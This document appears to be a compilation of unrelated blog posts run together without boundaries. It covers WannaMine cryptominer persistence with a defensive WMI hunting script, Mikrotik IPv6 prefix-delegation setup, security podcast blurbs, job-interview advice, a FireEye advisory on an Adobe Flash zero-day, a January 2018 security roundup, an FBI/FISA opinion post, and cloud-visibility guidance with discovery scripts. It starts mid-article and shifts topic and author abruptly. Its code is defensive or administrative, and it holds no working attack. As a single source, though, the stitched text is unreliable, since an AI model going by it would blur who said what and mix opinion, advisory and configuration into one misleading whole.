WannaMine, the security researchers explain, employs “living off the land” techniques for persistence, such as Windows Management Instrumentation (WMI) permanent event subscriptions. The malware has a fileless nature, leveraging PowerShell for infection, which makes it difficult to block without the appropriate security tools.

The malware uses credential harvester Mimikatz to acquire legitimate credentials that would allow it to propagate and move laterally. If that fails, however, the worm attempts to exploit the remote system via EternalBlue.

To achieve persistence, WannaMine sets a permanent event subscription that would execute a PowerShell command located in the Event Consumer every 90 minutes.

The malware targets all Windows versions starting with Windows 2000, including 64-bit versions and Windows Server 2003. However, it uses different files and commands for Windows Vista and newer platform iterations.

WannaMine isn't the only crypto-mining malware harnessing EternalBlue and using Windows Management Instrumentation to propagate. Another Monero-mining worm, dubbed Smominru (aka Ismo), has infected over half a million Windows hosts, most of them servers.

These "next-generation" crypto-mining malware variants have proven extremely difficult to take down. First, the malware is widely distributed. Second, even if all machines on a network are patched against EternalBlue, the malware can still spread using legitimate credentials harvested by Mimikatz. Finally, some legacy antivirus products do not detect crypto-mining malware because it doesn't actually write files to an infected machine's disk.
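Because the WMI permanent event subscriptions described above survive reboots, enumerating unexpected event consumers is one practical hunting step. A hedged sketch using the third-party Python wmi package (Windows only; the WQL queries target the standard root\subscription classes, but treat the exact queries as an assumption to adapt):

import wmi  # third-party package: pip install wmi (Windows only)

conn = wmi.WMI(namespace="root\\subscription")

# Permanent subscriptions pair an event filter with a consumer via a binding.
for consumer in conn.query("SELECT Name, CommandLineTemplate FROM CommandLineEventConsumer"):
    print("Consumer:", consumer.Name, "->", consumer.CommandLineTemplate)

for binding in conn.query("SELECT Filter, Consumer FROM __FilterToConsumerBinding"):
    print("Binding:", binding.Filter, "bound to", binding.Consumer)

Anything in that output you cannot trace back to legitimate management software deserves a closer look.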

Protecting Your Organization Against WannaMine and Other Crypto-Mining Malware

There are several ways to protect your enterprise systems from being hijacked for illegal crypto-mining:

  • Keep your systems and software up to date; only unpatched Windows machines are susceptible to the EternalBlue exploit.
  • Use network security software to monitor for and block the activity needed for crypto-miners to work.
  • Ensure that all system users are using strong passwords that cannot easily be guessed or brute-forced.

In addition to doing damage to enterprise systems, crypto-mining malware can be employed by real-world threat actors to fund their criminal activity. It’s in everyone’s best interest to put a stop to it.

The cyber security experts at Lazarus Alliance have deep knowledge of the cyber security field, are continually monitoring the latest information security threats, and are committed to protecting organizations of all sizes from security breaches. Our full-service risk assessment services and Continuum GRC RegTech software will help protect your organization from data breaches, ransomware attacks, and other cyber threats.

Lazarus Alliance is proactive cyber security®. Call 1-888-896-7580 to discuss your organization’s cyber security needs and find out how we can help your organization adhere to cyber security regulations, maintain compliance, and secure your systems.


How to configure a Mikrotik router as DHCP-PD Client (Prefix delegation)

Over time more and more ISPs provide IPv6 addresses to the router (and the clients behind it) via DHCP-PD. To be more verbose, that's DHCPv6 with Prefix Delegation. This allows the ISP to provide you with more than one subnet, which lets you use multiple networks without NAT. And forget about NAT with IPv6 – there is no standardized way to do it, and it will break too much. The idea with PD is also that you can use normal home routers and cascade them, which requires that each router provides a smaller prefix/subnet to the next router. Everything should work without configuration – that was at least the plan of the IETF working group.

Anyway, let's stop with the theory and provide some code. In my case my provider requires the router to establish a PPPoE tunnel, which provides the router with an IPv4 address automatically. The config looks like this:

/interface pppoe-client add add-default-route=yes disabled=no interface=ether1vlanTransitModem name=pppoeDslInternet password=XXXX user=XXXX

For IPv6 we need to enable the DHCPv6 client with the following command:

/ipv6 dhcp-client add interface=pppoeDslInternet pool-name=poolIPv6ppp use-peer-dns=no

But a check with

/ipv6 dhcp-client print

will only show you that the client is "searching…". The reason for this is that you most likely block incoming connections from the Internet (if you don't filter at all – bad boy! :-) ). You need to allow DHCPv6 replies from the server.

/ipv6 firewall filter add chain=input comment="DHCPv6 server reply" port=547 protocol=udp src-address=fe80::/10

Now the client status should show the delegated prefix instead of "searching…".

In this case we got a /60 prefix delegated from the ISP, which corresponds to 16 /64 subnets. The last step is to configure the IP addresses on your internal networks. Yes, you could just statically add the addresses, but if the provider changes the prefix after a disconnect, you would need to reconfigure them again. It's better to configure the router to dynamically assign addresses from the delegated pool to the internal interfaces. You just need to call the following for each of your internal interfaces:

/ipv6 address add from-pool=poolIPv6ppp interface=vlanInternal

The following command should show the prefixes currently assigned to the various internal networks:

/ipv6 address print

Hey, IPv6 is not that complicated. 🙂

Put Your Dockers On – Business Security Weekly #72

This week, Michael and Paul interview Vik Desai, Managing Director at Accenture! Matt Alderman and Asif Awan of Layered Insight join Michael and Paul for another interview! In the news, we have updates from BehavioSec, RELX, DISCO, Logikcull, and more on this episode of Business Security Weekly!

Full Show Notes: https://wiki.securityweekly.com/SSWEpisode72

 

Visit https://www.securityweekly.com/ssw for all the latest episodes!

Stay Classy – Application Security Weekly #04

This week, Keith and Paul discuss the OWASP Application Security Verification Standard! In the news, Intel warns Chinese companies of chip flaw before the U.S. government, bypassing CloudFlare using Internet-wide scan data, and more on this episode of Application Security Weekly!

 

Full Show Notes: https://wiki.securityweekly.com/ASW_Episode04

 

Visit https://www.securityweekly.com/ for all the latest episodes!

Firestarter: Best Practices for Root Account Security and… SQRRL!!!!

Posted under: Firestarter

Just because we are focusing on cloud fundamentals doesn’t mean we are forgetting the rest of the world. This week we start with a discussion over the latest surprise acquisition of Sqrrl by Amazon Web Services and what it might indicate. Then we jump into our ongoing series of posts on cloud security by focusing on the best practices for root account security. From how to name the email accounts, to handling MFA, to your break glass procedures.

Watch or listen:


- Rich

Ten things you may reveal during job interview (Response to Forbes Article)

Ten things you may reveal during job interview (Response to Forbes Article)

In continuation of my recent articles on preparing for an interview and a few pointers to perform better during one, I stumbled on an article at Forbes - Ten Things Never, Ever to Reveal in a Job Interview by Liz Ryan. I agree with some of the pointers she voiced, but a few might hurt the employee/employer relationship in the long run, or may even be considered borderline unethical. This blog post is an attempt to share my humble opinion, drawing on my experience as both an entrepreneur and an employee. Please read it with a pinch of salt, and do share your comments.

As per the Forbes article, here are the ten things to keep to yourself (with my opinions alongside each):

  1. The fact that you got fired from your last job -- or any past job.
    Yes, this is irrelevant and can be avoided in the interview.
    But if your firing involved a legal case against you, or anything the new employer may find in a background check or police verification, it's better to come clean at the start than to be embarrassed later.

  2. The fact that your last manager (or any past manager) was a jerk, a bully, a lousy manager or an idiot, even if all those things were true.
    No need to mention that. No one likes to interview a candidate who complains about old colleagues or managers.
    It may only be acceptable, to an extent, if the situation resulted in a harassment case and you made the "justifiable" decision to leave the firm because of how they treated you.

  3. The fact that you are desperate for a job. Some companies will be turned off by this disclosure, and others will use it as a reason to low-ball you.
    I agree here. Keep the leverage to negotiate the terms for yourself, and don't expose all your cards.

  4. The fact that you feel nervous or insecure about parts of the job you're applying for. You don't want to be cocky and say "I can do this job in my sleep!" but you also don't want to express the idea that you are worried about walking into the new job. Don't worry! Everyone is worried about every new job, until you figure out that everyone is faking it anyway so you may as well fake it, too.
    Okay, I do agree with the pointer here, but if you are insecure or feeling nervous, you might as well give this position a rethink. Pursue a role you are confident you can manage, and don't manipulate the interviewer by showing "confidence" when you have no idea of the role and its responsibilities. Don't express the nervous jitters of a new job, nor be cocky with overconfidence. Be true to yourself and the employer if the assignment is well within your forte.

  5. The fact that you had a clash or conflict with anybody at a past job or that you got written up or put on probation. That's no one's business but yours.
    This is on the same grounds as being fired from your last job, or your relationship with your ex-manager. Choose sensibly, as there's no black-and-white answer to handling this situation without knowing the complete context. There are scenarios where you may want to tell the interviewer (for example, if your old company may well be a client of the new firm and you could be allocated to that project (TRUE STORY)).

  6. The fact that you have a personal issue going on that could create scheduling difficulty down the road. Keep that to yourself unless you already know that you need accommodation, and you know what kind of accommodation you need. Otherwise, button your lip. Life takes its own turns. Who knows what will happen a few months from now?
    Okay, I don't agree with this 100%. As an entrepreneur, I would like my employee, or a candidate I am hiring, to be straight with me if they have an ongoing commitment or something that might come up. Most companies hire candidates with a probation period of a few weeks, and a company may even fire you if you intentionally hid a planned "engagement" from the firm.
    Companies' outlook is changing, and they would appreciate it if you keep them in the loop on ongoing personal issues (briefly) so they can set the right expectations for deliverables. Otherwise, your performance and scheduling may well slide off track, which can cause you problems in the long run.

  7. The fact you're pregnant, unless you're already telling people you don't know well (like the checker at the supermarket). A prospective employer has no right to know the contents of your uterus. It is none of their business.
    I have a different opinion on this, and my answer depends on which trimester you are in. If you are in the first trimester, and by God's grace doing well, telling the employer is your choice. Keep in mind that if the employer is unaware of your health status, they may not be able to judge the kind of workload that is "healthy" for you, or know that you have a medical reason for not doing overtime, etc.
    In the second trimester you have to be careful, and you should tell the employer about your condition. It will not be well received if, a month after joining, you go on maternity leave. The employer may well have commitments on ongoing projects and deadlines.
    And if you are in the third trimester, I would recommend you enjoy your pregnancy and not stress about looking for a new job, projects, and deadlines. You have a much more significant responsibility and a full-time job for the next few months.

  8. The fact that this job pays a lot more than the other jobs you've held. That information is not relevant and will only hurt you.
    Yes, I agree. Every situation and employer will have their own range of compensation, and the only thing you have to consider is whether that's enough for you, independent of your last paycheck or other jobs.

  9. The fact that you are only planning to remain in your current city for another year or some other period of time. That fact alone will cause many companies not to hire you. They want to retain the right to fire you for any reason or no reason, at any moment -- but they can't deal with the fact that you have your own plans, too -- and that people don't always take a job with the intention of staying in the job forever.
    If you are planning to stay in the city for a year and then move, let the employer know about it. Understand that your relationship with the employer is mutual, and you would expect the same from them. What if the employer were closing the office in six months, hired you while hiding that fact, and then let you go in six months? We don't have to lie to each other to hire the perfect person or land the ideal job.

  10. The fact that you know you are overqualified for the job you're interviewing for, and that your plan is to take the job and quickly get promoted to a better job. For some reason, many interviewers find this information off-putting. I have been to countless HR gatherings where I heard folks complaining about "entitled" or "presumptuous" job applicants who had the nerve to say "This job is just a stepping stone for me." How dare they!
    Without a doubt, I agree. But if you are overqualified for the job, or you think you may well get bored, think again before saying yes to the employer. Refer to my previous articles on preparation and performance.

In general, when I appear for an interview, or when I interview someone, I prefer to be straightforward about my current situation, and I expect the same from the employer. The working relationship is essential and must not start by hiding information that can impact your performance. You will spend a third of your life at your workplace, and I don't think you want to kick it off by keeping critical facts hidden. Before you hide something, think about whether it will shock or surprise your employer when it is eventually disclosed, and how well they would react to it.

Employee or employer, both have their commitments and deadlines. The person interviewing you, or the one who will manage you, has to know if you have some hiccups along the way; otherwise their performance may also be impacted because of you. So, think through these pointers again and share what you feel is necessary to set the right expectations.

Cheers, and best wishes.

Disclaimer:
This article shares my opinions and is in no way meant as an attack on the Forbes article. Please take it with a pinch of salt.

Hackers Targeting 2018 Winter Olympic Games

The world is four days away from the opening ceremonies for the 2018 Winter Olympics held in Pyeongchang, South Korea. The Olympics are an athletic spectacle fraught with political undertones and have occasionally been targeted by terrorists and activists. As cyber threats have evolved and increased, so too has the probability of such attacks on the Games. Wired.com reports, “More so than any previous Olympics, the run-up to Pyeongchang has been plagued by apparent state-sponsored hackers.”

The Games have not even begun, but according to McAfee Advanced Threat Research, as of early January hackers had already launched an email phishing campaign using a malicious MS Word attachment. Another attack campaign, which McAfee has dubbed Operation GoldDragon, attempted to plant three distinct spyware tools on target machines that would enable hackers to scour the compromised computers' contents.

The hackers could be lone actor mercenaries acting at the behest of nation-states, or they may be government staff. McAfee suspects the attacks originated from Russia and North Korea. The latter is a prime suspect, given its saber-rattling in the past year, its acrimonious relationship with its neighbor, and its suspected ties to the WannaCry Ransomware attack in the spring of 2017 and the attack on Sony Pictures in November of 2014.

Anyone who hacks the Games is most likely trying to do the following:

  • Create chaos and make operations more difficult for the Games and citizens in general
  • Exact revenge on the US and other countries for economic sanctions
  • Steal sensitive intellectual property or sensitive consumer data

Thus far, no one has speculated about the probability of a distributed denial of service (DDoS) attack on the Games, but it certainly is possible. A DDoS attack could be a nuisance that impacts the availability of one or more websites, it could be a stealth attack that masks a more dangerous malware threat, or it could be a massive attack on critical infrastructure that cripples daily operations in the region or in the Olympic village. Let's hope that the South Korean authorities and the Olympic Games organization have effective DDoS protection in place to prevent such attacks.

For more information, contact us.

Hopefully Intel is working on hardware solution of…

Hopefully Intel is working on a hardware solution to this flaw. An obvious approach is to add a fully isolated device that performs scheduled encryption of all sensitive information (which is not being used for computation anyway), with decryption done only when a request takes longer than the access time of a Meltdown-style read. Such a solution would help not only against Meltdown, but also against any attempt to grab a password without touching the keyboard.

It Was Wide Open – Paul’s Security Weekly #546

This week, InfoSecWorld speakers Mark Arnold & Will Gragido join us for an interview! John Strand of Black Hills Information Security joins us for the Technical Segment on MITRE! In the news, we have updates from Discord, Bitcoin, NSA, Facebook, and more on this episode of Paul's Security Weekly!

Full Show Notes: https://wiki.securityweekly.com/Episode546

Visit https://www.securityweekly.com/psw for all the latest episodes!

Blame privacy activists for the Memo??

Former FBI agent Asha Rangappa @AshaRangappa_ has a smart post debunking the Nunes Memo, then takes it all back again with an op-ed in the NYTimes blaming us privacy activists. She presents an obviously false narrative that the FBI and FISA courts are above suspicion.

I know from first-hand experience that the FBI is corrupt. In 2007, they threatened me, trying to get me to cancel a talk that revealed security vulnerabilities in a large corporation's product. Such abuses occur because there is no transparency and oversight. FBI agents write down our conversations in their little notebooks instead of recording them, so that they can control the narrative of what happened, presenting their version of the conversation (leaving out the threats). In this day and age of recording devices, this is indefensible.

She writes "I know firsthand that it’s difficult to get a FISA warrant". Yes, the process was difficult for her, an underling, to get a FISA warrant. The process is different when a leader tries to do the same thing.

I know this first hand, having casually worked as an outsider with intelligence agencies. I saw two processes in place: one for the flunkies, and one for those above the system. The flunkies constantly complained about how much process was in place oppressing them, preventing them from getting their jobs done. The leaders understood the system and how to sidestep those processes.

That's not to say the Nunes Memo has merit, but it does point out that privacy advocates have a point in wanting more oversight and transparency in such surveillance of American citizens.

Blaming us privacy advocates isn't the way to go. It's not going to succeed in tarnishing us, but will push us more into Trump's camp, causing us to reiterate that we believe the FBI and FISA are corrupt.

Attacks Leveraging Adobe Zero-Day (CVE-2018-4878) – Threat Attribution, Attack Scenario and Recommendations

On Jan. 31, KISA (KrCERT) published an advisory about an Adobe Flash zero-day vulnerability (CVE-2018-4878) being exploited in the wild. On Feb. 1, Adobe issued an advisory confirming the vulnerability exists in Adobe Flash Player 28.0.0.137 and earlier versions, and that successful exploitation could potentially allow an attacker to take control of the affected system.

FireEye began investigating the vulnerability following the release of the initial advisory from KISA.

Threat Attribution

We assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper. We have observed TEMP.Reaper operators directly interacting with their command and control infrastructure from IP addresses assigned to the STAR-KP network in Pyongyang. The STAR-KP network is operated as a joint venture between the North Korean Government's Post and Telecommunications Corporation and Thailand-based Loxley Pacific. Historically, the majority of their targeting has been focused on the South Korean government, military, and defense industrial base; however, they have expanded to other international targets in the last year. They have taken interest in subject matter of direct importance to the Democratic People's Republic of Korea (DPRK) such as Korean unification efforts and North Korean defectors.

In the past year, FireEye iSIGHT Intelligence has discovered newly developed wiper malware being deployed by TEMP.Reaper, which we detect as RUHAPPY. While we have observed other suspected North Korean threat groups such as TEMP.Hermit employ wiper malware in disruptive attacks, we have not thus far observed TEMP.Reaper use their wiper malware actively against any targets.

Attack Scenario

Analysis of the exploit chain is ongoing, but available information points to the Flash zero-day being distributed in a malicious document or spreadsheet with an embedded SWF file. Upon opening and successful exploitation, a decryption key for an encrypted embedded payload would be downloaded from compromised third party websites hosted in South Korea. Preliminary analysis indicates that the vulnerability was likely used to distribute the previously observed DOGCALL malware to South Korean victims.

Recommendations

Adobe stated that it plans to release a fix for this issue the week of Feb. 5, 2018. Until then, we recommend that customers use extreme caution, especially when visiting South Korean sites, and avoid opening suspicious documents, especially Excel spreadsheets. Due to the publication of the vulnerability prior to patch availability, it is likely that additional criminal and nation state groups will attempt to exploit the vulnerability in the near term.

FireEye Solutions Detections

FireEye Email Security, Endpoint Security with Exploit Guard enabled, and Network Security products will detect the malicious document natively. Email Security and Network Security customers who have enabled the riskware feature may see additional alerts based on suspicious content embedded in malicious documents. Customers can find more information in our FireEye Customer Communities post.

Cyber Security Roundup for January 2018

2018 started with a big security alert bang after Google Security Researchers disclosed serious security vulnerabilities in just about every computer processor in use on the planet. Named 'Meltdown' and 'Spectre’, when exploited by a hacker or malware, these vulnerabilities disclose confidential data. As a result, a whole raft of critical security updates was hastily released for computer and smartphone operating systems, web browsers, and processor drivers. While processor manufacturers have been rather lethargic in reacting and producing patches for the problem, software vendors such as Microsoft, Google and Apple have reacted quickly, releasing security updates to protect their customers from the vulnerable processors, kudos to them.

The UK Information Commissioner's Office (ICO) heavily criticised Carphone Warehouse for security inadequacies and fined the company £400K following its 2015 data breach, when the personal data, including bank details, of millions of Carphone Warehouse customers was stolen by hackers, in what the company at the time described as a "sophisticated cyber attack" – where have we heard that excuse before? Certainly the ICO wasn't buying that after it investigated, reporting a large number of Carphone Warehouse security failures, which included the use of software that was six years out of date; a lack of "rigorous controls" over who had login details to systems; no antivirus protection running on the servers holding data; the same root password being used on every individual server, which was known to "some 30-40 members of staff"; and the needless storage of full credit card details. Carphone Warehouse should thank their lucky stars the breach didn't occur after the General Data Protection Regulation comes into force; with such a damning list of security failures, the company may well have been fined considerably more by the ICO, which gains vastly greater financial sanctions and powers when the GDPR kicks in this May.

The National Cyber Security Centre warned that UK national infrastructure faces serious nation-state attacks, stating it is a matter of "when", not "if". There were also claims that the cyberattacks against Ukraine in recent years were down to Russia testing and tuning its nation-state cyberattack capabilities.

At the Davos summit, the Maersk chairman revealed his company spent a massive £200m to £240m on recovering from the recent NotPetya ransomware outbreak, after the malware 'totally destroyed' the Maersk network. That's a huge price to pay for not regularly patching your systems.

It's no surprise that cybercriminals continue to target cryptocurrencies given the high financial rewards on offer. The most notable attack was a £290k cyber-heist from BlackWallet, where the hackers redirected 700k BlackWallet users to a fake replica BlackWallet website after compromising BlackWallet's DNS server. The replica website ran a script that transferred user cryptocurrency into the hackers' wallet; the hackers then moved the currency onto a different wallet platform.

In the United States, the Federal Trade Commission (FTC) fined toy firm VTech US$650,000 (£482,000) for violating US children's privacy law. The FTC alleged the toy company violated the Children's Online Privacy Protection Rule (COPPA) by collecting personal information from hundreds of thousands of children without providing direct notice.

It was reported that a POS malware infection at Forever21, along with lapses in encryption, was responsible for the theft of debit and credit card details from Forever21 stores late last year. Payment card data continues to be a high-value target for cyber crooks with sophisticated attack capabilities, who are willing to invest considerable resources to achieve their aims.

Several interesting cybersecurity reports were released in January. The Online Trust Alliance Cyber Incident & Breach Trends Report: 2017 concluded that cyber incidents doubled in 2017 and that 93% were preventable. Carbon Black's 2017 Threat Report stated that non-malware-based cyber-attacks were behind the majority of cyber-incidents reported in 2017, despite the proliferation of malware available to both professional and amateur hackers. Carbon Black also reported that ransomware attacks are inflicting significantly higher costs and that the number of attacks skyrocketed during the course of the year, no surprise there.

Malwarebytes 2017 State of Malware Report said ransomware attacks on consumers and businesses slowed down towards the end of 2017 and were being replaced by spyware campaigns, which rose by over 800% year-on-year. Spyware campaigns not only allow hackers to steal precious enterprise and user data but also allows them to identify ideal attack points to launch powerful malware attacks. The Cisco 2018 Privacy Maturity Benchmark Study claimed 74% of privacy-immature organisations were hit by losses of more than £350,000, and companies that are privacy-mature have fewer data breaches and smaller losses from cyber-attacks.


Evolving to Security Decision Support: Visibility is Job #1

Posted under: Research and Analysis

To demonstrate our mastery of the obvious, it’s not getting easier to detect attacks. Not that it was ever really easy, but at least you used to know what tactics adversaries used, and you had a general idea of where they would end up, because you knew where your important data was, and which (single) type of device normally accessed it: the PC. It’s hard to believe we now long for the days of early PCs and centralized data repositories.

But that is not today’s world. You face professional adversaries (and possibly nation-states) who use agile methods to develop and test attacks. They have ways to obfuscate who they are and what they are trying to do, which further complicate detection. They prey on the ever-present gullible employees who click anything to gain a foothold in your environment. Further complicating matters is the inexorable march towards cloud services – which moves unstructured content to cloud storage, outsources back-office functions to a variety of service providers, and moves significant portions of the technology environment into the public cloud. And all these movements are accelerating – seemingly exponentially.

There has always been a playbook for dealing with attackers when we knew what they were trying to do. Whether or not you were able to effectively execute on that playbook, the fundamentals were fairly well understood. But as we explained in our Future of Security series, the old ways don’t work any more, which puts practitioners behind the 8-ball. The rules have changed and old security architectures are rapidly becoming obsolete. For instance it’s increasingly difficult to insert inspection bottlenecks into your cloud environment without adversely impacting the efficiency of your technology stack. Moreover, sophisticated adversaries can use exploits which aren’t caught by traditional assessment and detection technologies – even if they don’t need such fancy tricks often.

So you need a better way to assess your organization’s security posture, detect attacks, and determine applicable methods to work around and eventually remediate exposures in your environment. As much as the industry whinges about adversary innovation, the security industry has also made progress in improving your ability to assess and detect these attacks. We have written a lot about threat intelligence and security analytics over the past few years. Those are the cornerstone technologies for dealing with modern adversaries’ improved capabilities.

But these technologies and capabilities cannot stand alone. Just pumping some threat intel into your SIEM won’t help you understand the context and relevance of the data you have. And performing advanced analytics on the firehose of security data you collect is not enough either, because you might be missing a totally new attack vector.

What you need is a better way to assess your organizational security posture, determine when you are under attack, and figure out how to make the pain stop. This requires a combination of technology, process changes, and clear understanding of how your technology infrastructure is evolving toward the cloud. This is no longer just assessment or analytics – you need something bigger and better. It’s what we now call Security Decision Support (SDS). Snazzy, huh?

In this blog series, “Evolving to Security Decision Support”, we will delve into these concepts to show how to gain both visibility and context, so you can understand what you have to do and why. Security Decision Support provides a way to prioritize the thousands of things you can do, enabling you to zero in on the few things you must.

As with all Securosis’ research developed using our Totally Transparent methodology, we won’t mention specific vendors or products – instead we will focus on architecture and practically useful decision points. But we still need to pay the bills, so we’ll take a moment to thank Tenable, who has agreed to license the paper once it’s complete.

Visibility in the Olden Days

Securing pretty much anything starts with visibility. You can’t manage what you can’t see – and a zillion other overused adages all illustrate the same point. If you don’t know what’s on your network and where your critical data is, you don’t have much chance of protecting it.

In the olden days – you know, way back in the early 2000s – visibility was fairly straightforward. First you had data on mainframes in the data center. Even when we started using LANs to connect everything, data still lived on a raised floor, or in a pretty simple email system. Early client/server systems started complicating things a bit, but everything was still on networks you controlled in data centers you had the keys to. You could scan your address space and figure out where everything was, and what vulnerabilities needed to be dealt with.

That worked pretty well for a long time. There were scaling issues, and a need (desire) to scan higher in the technology stack, so we started seeing first stand-alone and then integrated application scanners. Once rogue devices started appearing on your network, it was no longer sufficient to scan your address space every couple weeks, so passive network monitoring allowed you to watch traffic and flag (and assess) unknown devices.

Those were the good old days, when things were relatively simple. Okay – maybe not really simple, but you could size the problem. That is no longer the case.

Visibility Challenged

We use a pretty funny meme in many of our presentations. It shows a man from the 1870s, remembering blissfully the good old days when he knew where his data was. That image always gets a lot of laughs from audiences. But it’s brought on by pain, because everyone in the room knows it illustrates a very real problem. Nowadays you don’t really know where your data is, which seriously compromises your capability to determine the security posture of the systems with access to it.

These challenges are a direct result of a number of key technology innovations:

  • SaaS: Securosis talks about how SaaS is the New Back Office, and that has rather drastic ramifications for visibility. Many organizations deploy CASB just to figure out which SaaS services they are using, because it’s not like business folks ask permission to use a business-oriented service. This isn’t a problem that’s going away. If anything more business processes will move to SaaS.
  • IaaS: Speaking of cloudy stuff, you have teams using Infrastructure as a Service (IaaS) – either moving existing systems out of your data centers, or building new systems in the cloud. IaaS really changes how you assess your environment, breaking most old techniques. Scanning is a lot harder, and some of the ‘servers’ (now called instances) live only for a few hours. Network addressing is different, and you cannot really implement taps to see all traffic. It’s a different world, where you are pretty much blind until you come up to speed with new techniques to replace tricks the cloud broke.
  • Containers: Another new foundational technology, containers bring much better portability and flexibility to building and deployment of application components. Without going into detail about why they’re cool, suffice it to say that your developers are likely working extensively with containers as they architect new applications, especially in the cloud. But containers bring new visibility and security challenges, in part because they are short-lived (they spin up and down automatically, responding to load and other triggers), self-contained (usually not externally addressable) and don’t provide access for traditional scans. They pretty well break existing discovery and assessment processes.
  • Mobility: It seems kind of old hat to even be mentioning the fact that you have critical data on smart devices (phones and tablets), but they expand your attack surface and make it hard to understand where your data is and how those devices are configured.
  • IoT: A little further out toward the horizon is the Internet of Things (IoT). Some argue it’s here today, and with the number of sensors being deployed and smart systems already network connected, they may be right. But either way, if you look even just a year or two out into the future, you can bet there will be a lot more network connected devices accessing your data and expanding your attack surface. So you’ll need to find and assess them.

And we are just getting started. It won't be long before the next discontinuous innovation makes it harder to figure out where critical data resides and what's happening with it. To put a bow on the challenges you face, we'll talk about some reasonable bets to make. We are confident there will be more cloud tomorrow than today. And equally confident that more devices will be accessing your stuff tomorrow. And that's pretty much all you need to know to understand the extent and magnitude of the problem.

Challenge Accepted

To again state the obvious, it’s hard to be a security professional nowadays. We get it. But curling up into the fetal position on your data center floor isn’t an option. First of all, you may not even have a data center any more. And if you do it might have been repurposed as warehouse space or sold off to a cloud provider. But even if you have a place, curling up won’t actually solve any problems.

So what can you do? Remember you cannot manage or protect what you cannot see, so we need to focus on visibility as the first step toward Security Decision Support. Visibility across the enterprise, wherever your data resides, on whatever platform. That means discovery and assessment of all your stuff.

We’re pretty sure you haven’t been able to totally shut off your data centers and move everything to SaaS and IaaS – even though you might want to – so you need to make sure you aren’t missing anything within your traditional infrastructure. You need to continue your existing vulnerability management program.

  • Network, security, databases, and systems: You already scan your network and security devices, all the servers you control, and probably your databases as well (thanks, compliance mandates!), so you’ll keep doing all that. Hopefully you have been evolving your vulnerability management environment, and have some means of prioritizing all the stuff in your environment.
  • Applications: You are likely scanning your web applications as well. That's a good thing – keep doing it, and keep working with developers to ensure they fix the issues you find before the applications are deployed to millions of customers. Obviously, as developers continue to adopt agile methods of building software, you will still need to evangelize finding issues with your application stacks and – given the velocity of software changes – fixing them faster.

That's the stuff you should already be doing. Maybe not as well as you should (there is always room for improvement, right?), but at least for compliance you are probably already doing something. It gets interesting when discovery and assessment intersect with the new environments and innovations you need to grapple with. Let's look at the innovations above, for a sense of how they change things in the new world.

SaaS

As mentioned, many of you have deployed a CASB (Cloud Access Security Broker) to monitor your network egress traffic and figure out which SaaS services you are actually using. It's always entertaining to hear about a vendor asking a customer how many SaaS services they think are in use, and hearing back: maybe a couple dozen. And then the vendor (with great dramatic effect) drops a report on the deck – it's closer to 1,500.

To be clear, you don’t need a purpose-built device or service to figure out which SaaS is in use – many secure web gateways offer this kind of visibility, as do the DLP solutions used to control exfiltration. But one method of discovery is to examine egress traffic.
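
As a rough illustration of the egress route (not a description of any particular product), the sketch below tallies destination domains from a web gateway or proxy log export to show which SaaS services employees are actually hitting. The log path and the column holding the destination host are assumptions you would adjust to your own gateway's format.

# Minimal sketch: tally SaaS destinations from an egress proxy log.
# Assumptions: whitespace-delimited log lines with the destination host in the
# third column, and a log export at the path below. Adjust both for your gateway.
from collections import Counter

LOG_PATH = "proxy_egress.log"   # hypothetical export from your web gateway
HOST_COLUMN = 2                 # zero-based index of the destination host field

def tally_destinations(path):
    counts = Counter()
    with open(path) as log:
        for line in log:
            fields = line.split()
            if len(fields) > HOST_COLUMN:
                host = fields[HOST_COLUMN].lower()
                # Collapse to a rough registered-domain suffix for grouping.
                counts[".".join(host.split(".")[-2:])] += 1
    return counts

if __name__ == "__main__":
    for domain, hits in tally_destinations(LOG_PATH).most_common(25):
        print(f"{hits:8d}  {domain}")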

Another kind of discovery and assessment is through each SaaS provider’s API (Application Programming Interface). The more mature SaaS companies understand that visibility is a problem, so they offer reasonable granularity for usage and activity via API. You can pull this information down and integrate it with other security data for analysis. We’ll dig into this analysis in our next post.
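
To make the API route concrete, here is a minimal Python sketch that pulls activity events from a hypothetical SaaS provider's audit endpoint so they can be merged with the rest of your security telemetry. The base URL, token handling, pagination convention, and JSON field names are all illustrative assumptions; every provider exposes this differently, so consult their actual API documentation.

# Minimal sketch: pull user-activity events from a SaaS provider's audit API.
# The endpoint, auth scheme, and response layout are assumptions for illustration.
import os
import requests

API_BASE = "https://api.example-saas.com/v1"    # hypothetical provider
TOKEN = os.environ.get("SAAS_API_TOKEN", "")    # never hard-code credentials

def fetch_activity(since):
    events = []
    url = f"{API_BASE}/audit/events"
    params = {"since": since}
    while url:
        resp = requests.get(url, params=params,
                            headers={"Authorization": f"Bearer {TOKEN}"},
                            timeout=30)
        resp.raise_for_status()
        body = resp.json()
        events.extend(body.get("events", []))
        url = body.get("next_page")   # assumed pagination convention
        params = None                 # cursor is embedded in next_page
    return events

if __name__ == "__main__":
    for event in fetch_activity("2018-02-01T00:00:00Z"):
        print(event.get("user"), event.get("action"), event.get("ip"))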

IaaS

As your organization moves existing systems and builds new applications in the cloud, you will need to work more proactively to get a sense of which resources actually live there. Unlike SaaS – where someone is presumably connecting to a service from inside your organization, giving you a chance to see it – an egress filter cannot provide much detail about what’s running within or going into a public cloud service.

In this case the API really is your friend. Any tool focused on visibility needs to poll the cloud provider’s API to learn what systems are running in the environment and assess them. One caution is the API limits some cloud providers impose. You cannot make unlimited API calls to any cloud provider, for obvious reasons, so you need to design your IaaS environment with this in mind.
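
For example, if part of your footprint is on AWS, a minimal discovery sketch with boto3 might paginate through EC2 instances per region and lean on the SDK's retry configuration to stay under API rate limits. Credentials are assumed to be configured already (environment, profile, or role), and the region list is an assumption; this is a sketch of the idea, not a complete inventory tool.

# Minimal sketch: enumerate EC2 instances across a few regions via the AWS API,
# using the SDK's built-in retry/backoff so API rate limits are respected.
# Assumes boto3 credentials are already configured; the region list is illustrative.
import boto3
from botocore.config import Config

REGIONS = ["us-east-1", "us-west-2", "eu-west-1"]   # adjust to your footprint
RETRY_CONFIG = Config(retries={"max_attempts": 10, "mode": "standard"})

def discover_instances():
    inventory = []
    for region in REGIONS:
        ec2 = boto3.client("ec2", region_name=region, config=RETRY_CONFIG)
        for page in ec2.get_paginator("describe_instances").paginate():
            for reservation in page["Reservations"]:
                for instance in reservation["Instances"]:
                    inventory.append({
                        "region": region,
                        "id": instance["InstanceId"],
                        "type": instance["InstanceType"],
                        "state": instance["State"]["Name"],
                    })
    return inventory

if __name__ == "__main__":
    for item in discover_instances():
        print(item)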

